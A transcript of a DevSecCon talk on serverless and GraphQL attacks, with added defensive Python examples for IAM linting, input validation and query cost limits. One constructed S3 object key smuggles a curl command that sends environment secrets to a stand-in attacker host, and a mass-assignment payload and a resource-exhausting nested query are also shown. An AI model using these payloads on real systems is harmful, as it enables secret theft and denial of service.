
DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas


Serverless technology (Functions as a Service) is fast becoming the next "big thing" in the world of distributed applications. Organizations are investing a great deal of resources in this technology as a force-multiplier, cost-saver and ops-simplification cure-all, and with widespread support from cloud vendors it is only going to become more influential. However, like everything else, serverless apps are subject to a wide variety of attacks, ranging from attacks against access-control technology such as JWTs, to NoSQL injection, to exploits against the functions themselves (deserialization, etc.) that escalate privileges into other cloud components.

On the other hand, GraphQL (an API query language) is the natural companion to serverless apps: traditional REST APIs are replaced with GraphQL for greater flexibility, richer query parameterization and speed, and GraphQL is slowly removing the need to develop REST APIs at all. Combined with serverless tech and reactive front-end frameworks, GraphQL is very powerful for distributed apps. However, GraphQL can be abused with a variety of attacks, including but not limited to injection attacks, nested resource-exhaustion attacks and authorization flaws.

This talk presents a red-team perspective on the ways testers can discover and exploit serverless and/or GraphQL-driven applications to compromise sensitive information and gain a deeper foothold in database services, IAM services and other cloud components. It includes demos of practical attacks and attack possibilities against serverless and GraphQL applications. The author will release an intentionally vulnerable serverless and GraphQL app at the end of the talk for the benefit of the audience and the security community at large.


  1. Singapore | 28 Feb - 01 Mar 2019
     An Attacker's View of Serverless and GraphQL Apps
     Sharath Kumar Ramadas
  2. About Me
     • Lead Solutions Engineer
     • we45 - An AppSec Company
     • Trainer - DevSecOps, Containers & Serverless
     • Developer - DVFAAS, Orchestron & ThreatPlayBook
     • Developer → DevOps → DevSecOps
     • @sharathkramadas
  3. Agenda
     • Intro to Serverless
     • Serverless Attacks
     • Intro to GraphQL
     • GraphQL Attacks
     • Demos
  4. SERVERLESS
  5. Serverless
     • Functions deployed as ephemeral containers/VMs
     • Functions as a Service (FaaS)
     • Event-trigger architecture
     • Supports the major runtimes: Python, NodeJS, C#, Go, Ruby
     • Custom runtimes are also supported
  6. Serverless Journey
  7. Functions
  8. Why Serverless?
     • Pay per usage
     • No server management
     • Microservices friendly
     • Auto-scalable
     • Focus on code/features, don't worry about servers
  9. FaaS Providers
  10. Architecture
  11. Serverless Use-Cases
     • ChatBots
     • Event-driven apps
     • Notification channels (SMS, email)
     • Scheduled jobs
     • Product websites
     • Lots more...
  12. Let's Deploy!
  13. Functions with Events
  14. An Attacker's View
     • Functions are still code
     • No frameworks involved
     • Event-triggered functions increase the attack surface
     • Developers are new to servers
     • Still needs configuration
  15. Attackers are Snipers!
     • Aimed
     • Committed
     • Patient
     • Invisible
     • Take a clear shot
  16. Claim your expenses
  17. Extensive Privileged Functions
     • Functions with extensive privileges lead to infrastructure compromise
     • Secrets placed in function environment variables are stored in plain text by default
     • Misconfigured roles open up a wide spectrum of attacks
     • Event sources are the most exposed, since they often lack authentication and authorization
     • Under attack, the pay-per-usage model turns out to be expensive
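The role misconfiguration this slide warns about is easy to check mechanically. The following is an added example, not code from the talk or from DVFaaS: a small Python linter that walks a Lambda execution-role policy and flags wildcard actions, wildcard resources and the pivot actions (iam:PassRole, sts:AssumeRole, lambda:UpdateFunctionCode and similar) that let a compromised function reach other cloud components. The two policy documents, the account ID and the pivot-action list are constructed for illustration.

```python
"""Lint a function's IAM role policy for the over-broad grants that turn one compromised
function into an account-wide foothold.

Added example, not code from the talk or DVFaaS. Both policy documents and the account
ID 123456789012 are constructed; the pivot-action list is a starting point, not complete.
"""
import fnmatch
import json

SEVERITY_ORDER = ("LOW", "MEDIUM", "HIGH", "CRITICAL")

# Actions that let a function reach other roles, credentials or code. Any of these on
# Resource '*' is an escalation path out of the function's own blast radius.
PIVOT_ACTIONS = (
    "iam:PassRole", "iam:CreateAccessKey", "iam:AttachRolePolicy", "iam:PutRolePolicy",
    "sts:AssumeRole", "lambda:UpdateFunctionCode", "lambda:UpdateFunctionConfiguration",
)

def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def lint_policy(policy):
    """Return (severity, statement_index, message) findings for the Allow statements."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(("HIGH", idx, "NotAction/NotResource allows everything not listed"))
        actions = _as_list(stmt.get("Action"))
        star_action = "*" in actions
        star_resource = "*" in _as_list(stmt.get("Resource"))
        if star_action:
            findings.append(("CRITICAL", idx, "Action '*' grants every API in the account"))
        for action in actions:
            if action != "*" and action.endswith(":*"):
                findings.append(("HIGH", idx, f"service-wide wildcard action {action}"))
        if star_resource and not star_action:
            findings.append(("MEDIUM", idx, "Resource '*': scope the grant to specific ARNs"))
            for action in actions:
                for pivot in PIVOT_ACTIONS:   # 'iam:*' or 'lambda:*' covers a pivot action too
                    if fnmatch.fnmatchcase(pivot, action):
                        findings.append(("HIGH", idx, f"{action} covers {pivot} on Resource '*' (pivot to other roles/code)"))
    return findings

def worst_severity(findings):
    """Highest severity present, or None for a clean policy."""
    return max((f[0] for f in findings), key=SEVERITY_ORDER.index, default=None)

# Constructed: the 'it just works' role many serverless deployments end up with.
OVER_PRIVILEGED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:*", "iam:PassRole"], "Resource": "*"},
    ],
}

# Constructed: the same claim-expenses function scoped to its own log group and table.
LEAST_PRIVILEGE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:ap-southeast-1:123456789012:log-group:/aws/lambda/claim-expenses:*"},
        {"Effect": "Allow",
         "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
         "Resource": "arn:aws:dynamodb:ap-southeast-1:123456789012:table/expenses"},
    ],
}

if __name__ == "__main__":
    for name, policy in (("over-privileged", OVER_PRIVILEGED_POLICY), ("least-privilege", LEAST_PRIVILEGE_POLICY)):
        print(name, worst_severity(lint_policy(policy)))
        for severity, idx, message in lint_policy(policy):
            print(f"  [{severity}] statement {idx}: {message}")
```

The second statement of the over-privileged policy is the one to notice: s3:* on every bucket is bad on its own, but iam:PassRole on Resource '*' is what lets a function that was only meant to resize images hand a more powerful role to something else, which is the "infrastructure compromise" path on the slide.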
  18. Accenture S3 Breach
  19. FedEx Breach
  20. Serverless Top 10
      • Event data injection
      • Broken authentication
      • Insecure deployment configuration
      • Over-privileged function permissions & roles
      • Inadequate function monitoring and logging
      • Insecure 3rd-party dependencies
      • Insecure application secrets storage
      • DoS and financial resource exhaustion
      • Function execution flow manipulation
      • Improper exception handling and verbose error messages
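Event data injection, first on the list above, is worth seeing in code. The following is an added example, not code from the talk or from DVFaaS: an S3-triggered thumbnailing function that interpolates the event's object key into a shell command, beside a hardened handler that validates the key against an allow-list and builds an argument vector instead. The event records, bucket name and attacker host are constructed; nothing is executed, the handlers only build the command so the difference is visible.

```python
"""Event data injection in an S3-triggered function: vulnerable vs hardened handler.

Added example, not code from the talk or DVFaaS. The event records, bucket name and
attacker host are constructed; 'convert' is never executed here.
"""
import os
import re
from urllib.parse import unquote_plus

def s3_event(key, bucket="claims-uploads"):
    """Constructed S3 notification in the shape Lambda delivers it; S3 URL-encodes keys."""
    return {"Records": [{"eventSource": "aws:s3",
                         "s3": {"bucket": {"name": bucket}, "object": {"key": key}}}]}

BENIGN_EVENT = s3_event("uploads/photo.jpg")
# Dec odes to: uploads/x.jpg;curl http://attacker.example/?e=$(env|base64)
# An object name chosen by whoever can write to the bucket, carrying a shell command that
# ships the function's environment (and any plain-text secrets in it) off-host.
MALICIOUS_EVENT = s3_event("uploads/x.jpg%3Bcurl+http%3A//attacker.example/%3Fe%3D%24%28env%7Cbase64%29")

def object_key(event):
    return unquote_plus(event["Records"][0]["s3"]["object"]["key"])

def build_command_vulnerable(event):
    """What an os.system()/shell=True handler runs: the key lands inside the shell line."""
    key = object_key(event)
    return f"convert /tmp/{key} -resize 128x128 /tmp/thumb-{os.path.basename(key)}"

# Hardened: validate the event-supplied key against what this function expects to
# process, then pass it as a single argv element so no shell ever parses it.
SAFE_KEY = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}(?:/[A-Za-z0-9][A-Za-z0-9_.-]{0,63}){0,7}")
ALLOWED_SUFFIXES = (".jpg", ".jpeg", ".png")

def validate_key(key):
    if not SAFE_KEY.fullmatch(key):          # every path segment starts alphanumeric, so no '..'
        raise ValueError(f"object key has characters outside the allow-list: {key!r}")
    if not key.lower().endswith(ALLOWED_SUFFIXES):
        raise ValueError(f"object key is not an image: {key!r}")
    return key

def handler_hardened(event, context=None):
    """Lambda-style handler: rejects bad input with a response instead of crashing."""
    try:
        key = validate_key(object_key(event))
    except (ValueError, KeyError, IndexError) as exc:
        return {"statusCode": 400, "body": str(exc)}
    argv = ["convert", f"/tmp/{key}", "-resize", "128x128", f"/tmp/thumb-{os.path.basename(key)}"]
    # In production: subprocess.run(argv, check=True, timeout=30)  (a list, never shell=True)
    return {"statusCode": 200, "argv": argv}

if __name__ == "__main__":
    print(build_command_vulnerable(MALICIOUS_EVENT))
    print(handler_hardened(MALICIOUS_EVENT))
    print(handler_hardened(BENIGN_EVENT))
```

The point the event source makes is that nobody authenticated the object name: an upload endpoint, a misconfigured bucket policy or another function upstream decides what arrives in `event["Records"]`, so the handler has to treat the key the way a web handler treats a query parameter.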
  21. Serverless (Security) Best Practices
      • Functions with minimal access credentials
      • Remove insecure dependencies before production
      • Run SAST scans before code commit
      • Restrict memory usage for a function
      • Encrypt secrets; avoid plain-text environment variables
      • Use the FaaS provider's authorization for access control (e.g. AWS Cognito)
      • Write security test cases and run them in CI/CD
  22. GraphQL
  23. GraphQL
      • A query language for APIs
      • Tech from Facebook
      • Query what you want, forget about the 'REST'
      • Single endpoint for API calls
      • Lightweight
  24. REST vs GraphQL
  25. Terminology
      • Type
      • Schema
      • Query
      • Mutation
      • Subscription
      • Introspection
      • Schema Stitching
  26. Let's Demo
  27. An Attacker's View
      • No response size limiting
      • Introspection is nice!
      • Single endpoint, so access control cannot be done per URL
  28. Demo: Want to get more powers!
  29. Mass Assignment
      • Frameworks allow saving the raw dump of HTTP request data straight into the model
      • Attackers can guess the sensitive fields
      • Sensitive fields allow privileges to be escalated
      • GraphQL has introspection enabled by default
      • Introspection leaks the sensitive fields' information
      • GraphQL supports a JSON scalar, which accepts arbitrary keys
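To make the mass-assignment path concrete, here is an added example (not code from the talk or from DVFaaS) of an updateProfile mutation resolver written both ways: once taking a JSON scalar and dumping it onto the user record, once bound to a typed UpdateProfileInput whose declared fields are the allow-list. The user store, the schema fragments in the comments and the payloads are constructed, and only the resolver logic is shown so no GraphQL library is needed.

```python
"""Mass assignment through a GraphQL mutation: JSON scalar input vs a typed input type.

Added example, not code from the talk or DVFaaS. The user store, the schema fragments
and the payloads are constructed; only resolver logic is shown.
"""

# What introspection reveals about the User type. role and balanceCents are visible to
# any client that asks for __type(name: "User"), but are meant to be server-managed.
USER_TYPE_FIELDS = ("id", "displayName", "email", "role", "balanceCents")

# The typed input a hardened schema declares for updateProfile; this is the allow-list:
#   input UpdateProfileInput { displayName: String, email: String }
UPDATE_PROFILE_INPUT = {"displayName": str, "email": str}

def make_store():
    """Fresh in-memory user table so every call starts from the same state."""
    return {"u1": {"id": "u1", "displayName": "alice", "email": "alice@example.com",
                   "role": "user", "balanceCents": 0}}

def server_managed_fields():
    """Fields introspection shows on User that no client input type may set."""
    return tuple(f for f in USER_TYPE_FIELDS if f not in UPDATE_PROFILE_INPUT)

# Vulnerable schema:  updateProfile(id: ID!, data: JSON!): User
# Having read the User type through introspection, the attacker sends:
#   mutation { updateProfile(id: "u1", data: {displayName: "alice", role: "admin",
#                                              balanceCents: 100000}) { role balanceCents } }
def resolve_update_profile_vulnerable(store, user_id, data):
    user = store[user_id]
    user.update(data)            # raw request payload dumped onto the record
    return {"data": user}

# Hardened schema:   updateProfile(id: ID!, data: UpdateProfileInput!): User
# A real GraphQL server rejects unknown input fields before the resolver runs; the
# resolver repeats the check so the logic is visible and still holds if someone later
# swaps the input type back to JSON.
def resolve_update_profile_hardened(store, user_id, data):
    errors = []
    for field, value in data.items():
        expected = UPDATE_PROFILE_INPUT.get(field)
        if expected is None:
            errors.append(f"Field '{field}' is not defined by type UpdateProfileInput")
        elif not isinstance(value, expected):
            errors.append(f"Field '{field}': expected {expected.__name__}, got {type(value).__name__}")
    if errors:
        return {"data": None, "errors": errors}
    user = store[user_id]
    user.update({k: data[k] for k in UPDATE_PROFILE_INPUT if k in data})
    return {"data": user}

ATTACK_PAYLOAD = {"displayName": "alice", "role": "admin", "balanceCents": 100000}
LEGIT_PAYLOAD = {"displayName": "Alice L.", "email": "alice@example.com"}

if __name__ == "__main__":
    print(resolve_update_profile_vulnerable(make_store(), "u1", ATTACK_PAYLOAD))
    print(resolve_update_profile_hardened(make_store(), "u1", ATTACK_PAYLOAD))
```

Disabling introspection (slide 35) only removes the field list from the attacker's first request; the names in `server_managed_fields()` are guessable, so the typed input, not the hidden schema, is the control.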
  30. GitHub Attack
  31. Let's burn a few dollars
  32. Serverless Cost
  33. Resource Exhaustion
      • aka Denial-of-Service attack
      • Overwhelming the server with requests until it crashes
      • Nested queries exhaust memory and other resources
      • Serverless + GraphQL = pay per usage + auto-scale
      • 2 million requests × $3 per query = (I will leave it to your imagination!)
  34. Recent Attack
  35. GraphQL (Security) Best Practices
      • Disable introspection
      • Disable the playground in production
      • Limit the query size
      • Depth limiting for nested queries
      • Avoid generic scalars; use input types
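Depth limiting and cost limiting, from the best-practices list above, are the guard against the resource-exhaustion attack described on slide 33. The following is an added example, not code from the talk or from DVFaaS: a small Python query checker that tokenizes a GraphQL document, computes nesting depth and an estimated node count from first:/last: arguments, and follows fragment spreads so the fan-out cannot be hidden behind fragments. The queries and the GitHub-style connection fields are constructed; the parser handles operations, variables, aliases and named fragments, and rejects anything it does not understand rather than letting it through.

```python
"""Depth and cost limits for nested GraphQL queries, with fragment spreads resolved.
Added example, not code from the talk or DVFaaS; queries are constructed and the
GitHub-style first: arguments are illustrative. Syntax not handled (directives, block
strings, inline fragments) makes the checker raise, so such queries are rejected."""
import re

MAX_PAGE_SIZE = 100  # assumed worst case when first/last is a variable
TOKEN_RE = re.compile(r'''(?P<ws>[\s,]+|\#[^\n]*)|(?P<spread>\.\.\.)|(?P<punct>[{}()\[\]:!$=])
    |(?P<name>[_A-Za-z][_0-9A-Za-z]*)|(?P<number>-?\d+(?:\.\d+)?(?:[eE][+-]?\d+)?)
    |(?P<string>"(?:[^"\\]|\\.)*")''', re.VERBOSE)

def tokenize(src):  # [(kind, text)] with whitespace, commas and comments dropped
    tokens, pos = [], 0
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:
            raise SyntaxError(f"bad character {src[pos]!r} at {pos}")
        pos = m.end()
        if m.lastgroup != "ws":
            tokens.append((m.lastgroup, m.group()))
    return tokens

def inner(toks, i):  # tokens inside the bracket opened at toks[i], and the index after it
    open_, depth = toks[i][1], 0
    close = {"{": "}", "(": ")", "[": "]"}[open_]      # KeyError when not a bracket: rejected
    for j in range(i, len(toks)):
        depth += (toks[j][1] == open_) - (toks[j][1] == close)
        if depth == 0:
            return toks[i + 1:j], j + 1
    raise SyntaxError("unbalanced brackets")

def split_document(toks):  # ([operation selection slices], {fragment name: slice})
    ops, frags, i = [], {}, 0
    while i < len(toks):
        name, val = None, toks[i][1]
        if val == "fragment":                          # fragment Name on Type { ... }
            name, i = toks[i + 1][1], i + 4
        elif val in ("query", "mutation", "subscription"):
            i += 1 + (toks[i + 1][0] == "name")       # optional operation name
            if toks[i][1] == "(":                      # variable definitions
                _, i = inner(toks, i)
        elif val != "{":
            raise SyntaxError(f"unexpected token {val!r}")
        body, i = inner(toks, i)
        if name is None:
            ops.append(body)
        else:
            frags[name] = body
    return ops, frags

def walk(body, frags, depth=1, seen=()):  # (max_depth, estimated_nodes) of one selection set
    max_depth, cost, i = depth, 0, 0
    while i < len(body):
        kind, val = body[i]
        i += 1
        if kind == "spread":                           # ...Name: follow it at the same depth
            name, i = body[i][1], i + 1
            if name in seen or name not in frags:
                raise ValueError(f"fragment cycle or unknown fragment: {name}")
            d, c = walk(frags[name], frags, depth, seen + (name,))
            max_depth, cost = max(max_depth, d), cost + c
            continue
        if kind != "name":
            raise SyntaxError(f"unexpected token {val!r}")
        if i < len(body) and body[i][1] == ":":        # alias: count the real field
            i += 2
        mult, d, c = 1, depth, 0
        if i < len(body) and body[i][1] == "(":
            args, i = inner(body, i)
            for j in range(len(args) - 2):             # first:/last: N, or a $variable
                if args[j][1] in ("first", "last") and args[j + 1][1] == ":":
                    v = args[j + 2][1]
                    mult = max(mult, MAX_PAGE_SIZE if v == "$" else int(v) if v.isdigit() else 1)
        if i < len(body) and body[i][1] == "{":
            sub, i = inner(body, i)
            d, c = walk(sub, frags, depth + 1, seen)
        max_depth, cost = max(max_depth, d), cost + mult * (1 + c)
    return max_depth, cost

def check_query(src, max_depth=6, max_cost=10_000):  # gate a query before resolvers run
    try:
        ops, frags = split_document(tokenize(src))
        results = [walk(body, frags) for body in ops] or [(0, 0)]
    except (SyntaxError, ValueError, IndexError, KeyError) as exc:
        return False, f"rejected: {exc}"
    depth, cost = max(d for d, _ in results), max(c for _, c in results)
    if depth > max_depth:
        return False, f"depth {depth} exceeds limit {max_depth}"
    if cost > max_cost:
        return False, f"estimated cost {cost} exceeds limit {max_cost}"
    return True, f"depth {depth}, estimated cost {cost}"

# Constructed queries: a normal one, a 100^3 fan-out, and the same fan-out hidden in fragments.
BENIGN_QUERY = "query Me($n: Int = 5) { viewer { login repositories(first: $n) { nodes { name } } } }"
ABUSE_QUERY = """{ viewer { repositories(first: 100) { nodes { issues(first: 100) { nodes {
  comments(first: 100) { nodes { body } } } } } } } }"""
FRAGMENT_QUERY = """query { viewer { ...R } }
fragment R on User { repositories(first: 100) { nodes { ...I } } }
fragment I on Repository { issues(first: 100) { nodes { ...C } } }
fragment C on Issue { comments(first: 100) { nodes { body } } }"""
```

Run `check_query` on the raw document before any resolver executes and put the reason string straight into the GraphQL errors array. The cost model is the usual one: each field costs its page size times one plus the cost of its children, so the three nested `first: 100` connections above estimate to about three million nodes, and the fragment version scores exactly the same because spreads are followed instead of skipped.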
  36. Hack It Yourself! https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
  37. Things to consider
      • OWASP Top 10
      • Serverless Top 10
      • SAST and SCA tools
      • Threat modeling
  38. Key Takeaways
      • Serverless security is still an application security problem
      • Roles and permissions should be well thought out
      • Secure coding practices need to be followed
      • Resource limits are highly recommended
  39. Thank You
      @sharathkramadas
